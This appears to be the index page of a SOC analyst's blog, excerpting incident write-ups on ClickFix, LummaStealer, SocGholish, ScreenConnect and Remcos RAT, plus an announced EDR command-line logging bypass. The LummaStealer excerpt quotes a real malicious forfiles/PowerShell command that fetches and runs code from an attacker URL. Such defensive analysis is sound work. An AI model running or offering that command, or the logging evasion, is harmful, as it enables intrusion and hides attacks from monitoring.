====================
== Alert Overload ==
====================
Tales from a SOC analyst

Getting Started with Malware Analysis and Reverse Engineering

This page is from internal enterprise documentation that was created to introduce common malware analysis topics. It is not a comprehensive document, and many sections link to online resources. Tool selection and documentation are largely based on what is present in the enterprise lab the document was created for.

Malware Analysis Workflow


    +-------------------------------------+
    |        Malware Analysis Workflow    |
    +-------------------------------------+
                       |
                       v
         +-----------------------------+
         |     Threat Intelligence     |
         +-----------------------------+
         | - Hash Lookups (VT, HA)     |
         | - IP/Domain Reputation      |
         |   (AbuseIPDB, ThreatFox)    |
         | - Sample Pivoting (Any.run) |
         | - YARA/IoC Extraction       |
         +-----------------------------+
                       |
                       v
         +----------------------------+
         |      Static Analysis       |
         +----------------------------+
         | - File Analysis            | <-- Tools: PEStudio, DIE, HashMyFiles
         | - Code Analysis            |
         | - Disassembly              | <-- Tools: Ghidra, IDA Free
         +----------------------------+
                       |
                       v
         +----------------------------+
         |      Dynamic Analysis      |
         +----------------------------+
         | - Network Monitoring       | <-- Tools: Wireshark, INetSim
         | - Process Monitoring       | <-- Tools: ProcMon, ProcExp
         | - API Call Monitoring      | <-- Tools: API Monitor
         | - Logging                  | <-- Tools: Sysmon, PowerShell logs
         +----------------------------+
                       |
                       v
    +-------------------------------------+
    |  Debugging & Reverse Engineering    |
    +-------------------------------------+
    | - IDA                               | <-- Tools: IDA Pro, Ghidra
    | - x64dbg                            | <-- Tools: x64dbg, Scylla
    +-------------------------------------+

Threat Intelligence

Threat intelligence gathering is an important step in scoping the work that needs to be done during the analysis. Often, a sample has defining traits that can be searched for in public threat intel spaces like VirusTotal, Tria.ge, or any other sandboxing/intel platform. By searching for these traits (hashes, filenames, network indicators, etc.), you can determine whether a sample needs to be reversed, categorized as a variant, or simply documented as a known sample.

Big EDR Hates This One Easy Trick!

Bypass Details

This will be a quick post, but I was playing around with a couple of EDR bypass methods this week after getting some inspiration from a ClickFix incident that abused SSH ProxyCommand. I wanted to write an EDR logging bypass that used SSH to launch arbitrary commands, improving on the method I saw in the incident. Unfortunately, I didn’t do that. However, I did write up a simple and compact method to bypass command line logging. It’s confirmed working with a major EDR product and likely works for all products (maybe, idk, I just have the one to test on).

ClickFix - freewebstatics

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

"ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts." (Office of Information Security)

Incident Overview

The SOC was alerted to a Potentially Unwanted Program (PUP) execution on a host device. This PUP was named client32.exe, which additionally flagged as a file that may be imitating a system file. Investigation of this alert revealed a base file path of "C:\Users\%USER%\AppData\Roaming\VFrTdT\client32.exe". This file belongs to the NetSupport Remote Monitoring and Management (RMM) tool. It is commonly used by threat actors to gain control of victim devices.

ClickFix - Smartlifeshift

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

"ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts." (Office of Information Security)

Incident Overview

ClickFix has been a persistent threat since its emergence in 2024. The SOC has seen and resolved alerts stemming from ClickFix on a weekly basis, with incidents ramping up heavily in 2025. Recently, there has been a troubling trend of added complexity in ClickFix events. This incident in particular uses stealth and persistence measures to deploy a Lumma payload after tricking users into executing a PowerShell command that serves as a loader for a separate malware dropper. This incident also demonstrates some obfuscation and session control measures. The loader uses a special User-Agent string to download the payload from the threat-actor-controlled infrastructure; any attempt to connect to the server without the proper headers fails. Despite these improvements, EDR was able to detect and prevent the initial download from completing.

Lumma

LummaStealer

Brief write-up on LummaStealer events observed in managed environments

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

Initial Detection Events

Users download a Windows .lnk (shortcut) file from a malicious site that contains a command to launch forfiles.exe (a LOLBin for executing commands) with a command line similar to "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto". This command line works as follows:

ScreenConnect

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

Initial Detection Events

The alert came from a concierge security service for the download and execution of an actor-controlled ScreenConnect RMM tool. The process was not blocked by EDR. SOC investigation concluded that the user executed a malicious application that may have installed ScreenConnect to give the actor remote access to the device.

SocGholish

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

SocGholish is a well-known malware campaign that masquerades as software updates, typically for browsers, to trick users into downloading malicious files. SocGholish often uses compromised websites to accomplish this. WordPress sites are particularly vulnerable if default configurations are not changed. On February 27th, 2024, an EDR alert led to the discovery of SocGholish malware on a state device. The EDR solution worked as intended and blocked the process from running. Further analysis found that a local Minnesota website was compromised and serving the malware. A search was conducted, and, in total, 12 distinct devices had visited the compromised website in the past 30 days (02/07/2024-03/07/2024). No evidence suggests that any compromise of state devices occurred.

Attack Chain

  1. The user visits a compromised website (ecowaterminnesota.com)
  2. An embedded script covers the screen and executes a linked malicious script.
  3. The malicious script contains the SocGholish payload.
  4. A fake update page is loaded over the screen, prompting the user to download a software update.
  5. The downloaded file is a JavaScript file often named “update”, “version”, or some other software-update-related name.
  6. The user executes the “update” file, and the malware connects to a Command and Control (C2) server.
  7. Data is exfiltrated and in some cases, lateral movement or secondary payloads may be executed.

Infector API

The infector API (not at all a malicious thing, although it definitely started as a malware delivery system) is a long-term project I started on in March. The primary goals were to establish a functional API server written entirely in Rust. Currently, the API server offers several different services, hooks into various technologies including a SQLite database for authentication, and has SSL/TLS support via Let’s Encrypt. In its current incarnation, it isn’t entirely ready for deployment. However, I thought this would be a good time to start documenting the journey I’ve taken creating this, and more importantly, what I’ve learned creating it.

Phishing Analysis #1

Phishing Analysis

This article was originally written for internal use. It has been adapted for public release. Some content has been removed. I’ll try and do an actual rewrite at some point.

E-Mail Message

Phishing attacks typically start with either a malicious attachment or malicious domain. For this sample, the phishing event started with a link to a PDF file hosted by Gamma App. Gamma App and other file hosts are often used to serve malicious files. These services often have little to no security measures in place for detecting or preventing malware or phishing.

Remcos v5.3.0

Remcos RAT

Reverse Engineering a Remcos RAT 5.3.0 Pro sample

This sample was taken from MalwareBazaar.

I was in the mood to do some malware reversing and came across an HTA sample on MalwareBazaar that seemed interesting. I had recently finished cleaning up some Lumma Stealer infections at work, and I wanted to dig into something that had a little more going on. There are only so many fake captcha pages you can clean up in one day :).
